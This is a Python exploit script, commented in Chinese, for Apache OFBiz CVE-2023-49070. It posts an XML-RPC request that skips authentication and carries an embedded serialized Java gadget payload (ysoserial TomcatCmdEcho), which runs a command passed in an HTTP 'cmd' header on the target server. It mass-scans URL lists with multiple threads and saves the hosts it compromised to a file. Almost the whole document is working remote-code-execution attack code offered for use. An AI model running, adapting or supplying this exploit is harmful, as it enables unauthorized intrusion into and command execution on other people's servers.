Apache-OFBiz_CVE-2023-49070_Exploit.py

# 作者: VulnExpo
# 日期: 2023-12-08

import requests
import argparse
import threading
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

def check_for_vulnerability(url, proxies=None, success_file=None):
	try:
		vulnurl = url+"/webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y"
		headers = {
			"cmd": "id"
		}
		data = '''<?xml version="1.0"?>
<methodCall>
  <methodName>RCE</methodName>
  <params>
	<param>
	  <value>
		<struct>
		  <member>
			<name>RCE</name>
			<value>
			  <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">   rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZZTaMLT7P4KxAwACSQAEc2l6ZUwACmNvbXBhcmF0b3J0ABZMamF2YS91dGlsL0NvbXBhcmF0b3I7eHAAAAACc3IAK29yZy5hcGFjaGUuY29tbW9ucy5iZWFudXRpbHMuQmVhbkNvbXBhcmF0b3LjoYjqcyKkSAIAAkwACmNvbXBhcmF0b3JxAH4AAUwACHByb3BlcnR5dAASTGphdmEvbGFuZy9TdHJpbmc7eHBzcgAqamF2YS5sYW5nLlN0cmluZyRDYXNlSW5zZW5zaXRpdmVDb21wYXJhdG9ydwNcfVxQ5c4CAAB4cHQAEG91dHB1dFByb3BlcnRpZXN3BAAAAANzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1lcQB+AARMABFfb3V0cHV0UHJvcGVydGllc3QAFkxqYXZhL3V0aWwvUHJvcGVydGllczt4cAAAAAD/////dXIAA1tbQkv9GRVnZ9s3AgAAeHAAAAACdXIAAltCrPMX+AYIVOACAAB4cAAAFK3K/rq+AAAAMwEFCgBFAIkKAIoAiwoAigCMCgAdAI0IAHoKABsAjgoAjwCQCgCPAJEHAHsKAIoAkggAkwoAIACUCACVCACWBwCXCACYCABYBwCZCgAbAJoIAJsIAHAHAJwLABYAnQsAFgCeCABnCACfBwCgCgAbAKEHAKIKAKMApAgApQcApggApwoAIACoCACpCQAlAKoHAKsKACUArAgArQoArgCvCgAgALAIALEIALIIALMIALQIALUHALYHALcKADAAuAoAMAC5CgC6ALsKAC8AvAgAvQoALwC+CgAvAL8KACAAwAgAwQoAGwDCCgAbAMMIAMQHAGQKABsAxQgAxgcAxwgAyAgAyQcAygcBAwcAzAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAsTHlzb3NlcmlhbC9wYXlsb2Fkcy90ZW1wbGF0ZXMvVG9tY2F0Q21kRWNobzsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAzQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAAFlAQAgTGphdmEvbGFuZy9Ob1N1Y2hGaWVsZEV4Y2VwdGlvbjsBAANjbHMBABFMamF2YS9sYW5nL0NsYXNzOwEABHZhcjUBACFMamF2YS9sYW5nL05vU3VjaE1ldGhvZEV4Y2VwdGlvbjsBAARjbWRzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEABnJlc3VsdAEAAltCAQAJcHJvY2Vzc29yAQASTGphdmEvbGFuZy9PYmplY3Q7AQADcmVxAQAEcmVzcAEAAWoBAAFJAQABdAEAEkxqYXZhL2xhbmcvVGhyZWFkOwEAA3N0cgEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA29iagEACnByb2Nlc3NvcnMBABBMamF2YS91dGlsL0xpc3Q7AQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQABaQEABGZsYWcBAAFaAQAFZ3JvdXABABdMamF2YS9sYW5nL1RocmVhZEdyb3VwOwEAAWYBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAHdGhyZWFkcwEAE1tMamF2YS9sYW5nL1RocmVhZDsBAA1TdGFja01hcFRhYmxlBwDOBwDPBwDQBwCmBwCiBwCZBwCcBwBiBwDHBwDKAQAKU291cmNlRmlsZQEAElRvbWNhdENtZEVjaG8uamF2YQwARgBHBwDQDADRANIMANMA1AwA1QDWDADXANgHAM8MANkA2gwA2wDcDADdAN4BAARleGVjDADfAOABAARodHRwAQAGdGFyZ2V0AQASamF2YS9sYW5nL1J1bm5hYmxlAQAGdGhpcyQwAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDADhANYBAAZnbG9iYWwBAA5qYXZhL3V0aWwvTGlzdAwA4gDjDADbAOQBAAtnZXRSZXNwb25zZQEAD2phdmEvbGFuZy9DbGFzcwwA5QDmAQAQamF2YS9sYW5nL09iamVjdAcA5wwA6ADpAQAJZ2V0SGVhZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAA2NtZAwA6gDrAQAJc2V0U3RhdHVzDADsAF4BABFqYXZhL2xhbmcvSW50ZWdlcgwARgDtAQAHb3MubmFtZQcA7gwA7wDwDADxAN4BAAN3aW4BAAdjbWQuZXhlAQACL2MBAAkvYmluL2Jhc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyAQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyDABGAPIMAPMA9AcA9QwA9gD3DABGAPgBAAJcQQwA+QD6DAD7AN4MAPwA/QEAJG9yZy5hcGFjaGUudG9tY2F0LnV0aWwuYnVmLkJ5dGVDaHVuawwA/gD/DAEAAQEBAAhzZXRCeXRlcwwBAgDmAQAHZG9Xcml0ZQEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BABNqYXZhLm5pby5CeXRlQnVmZmVyAQAEd3JhcAEAE2phdmEvbGFuZy9FeGNlcHRpb24BACp5c29zZXJpYWwvcGF5bG9hZHMvdGVtcGxhdGVzL1RvbWNhdENtZEVjaG8BAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAVamF2YS9sYW5nL1RocmVhZEdyb3VwAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAOZ2V0VGhyZWFkR3JvdXABABkoKUxqYXZhL2xhbmcvVGhyZWFkR3JvdXA7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAdnZXROYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEADWdldFN1cGVyY2xhc3MBAARzaXplAQADKClJAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7AQAJZ2V0TWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAGGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZAEABmludm9rZQEAOShMamF2YS9sYW5nL09iamVjdDtbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEAB2lzRW1wdHkBAAMoKVoBAARUWVBFAQAEKEkpVgEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9T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
			  </serializable>
			</value>
		  </member>
		</struct>
	  </value>
	</param>
  </params>
</methodCall>
		'''
		res = requests.post(vulnurl, headers=headers, data=data, verify=False, timeout=30)
		res.encoding = "utf-8"
		if res.status_code == 200 and "uid=" in res.text:
			print(f"目标URL: {url} ")
			with open(success_file, 'a') as s_file:
				s_file.write(f"++++++++++++++++++\n")
				s_file.write(f"目标URL: {url}\n")
				s_file.write("响应内容: {}\n\n".format(res.text.split('\n')[0]))
			return True
	except Exception as e:
		print(f"发生异常：{e}")
		return False

def scan_targets(targets, proxies=None, success_file=None):
	for target in targets:
		target = target.strip()
		check_for_vulnerability(target, proxies, success_file)

def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
	threads = []

	for i in range(num_threads):
		thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file))
		threads.append(thread)

	for thread in threads:
		thread.start()

	for thread in threads:
		thread.join()

if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="Apache OFBiz XML-RPC代码执行漏洞CVE-2023-49070")
	parser.add_argument("-u", "--url", help="目标URL")
	parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表，默认为url.txt")
	parser.add_argument("-t", "--threads", type=int, default=4, help="线程数，默认为4")
	parser.add_argument("-p", "--proxy", help="代理服务器地址（例如：http://localhost:8080）")
	args = parser.parse_args()

	if not args.url and not args.file:
		print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
		exit(1)

	if args.url:
		urls = [args.url]
	elif args.file:
		with open(args.file, 'r') as file:
			urls = file.readlines()

	success_file = 'success_targets.txt'

	proxies = {
		"http": args.proxy,
		"https": args.proxy
	} if args.proxy else None

	multi_threaded_scan(urls, proxies, success_file, args.threads)

	print("扫描完成，成功的目标已保存到 success_targets.txt 文件中。")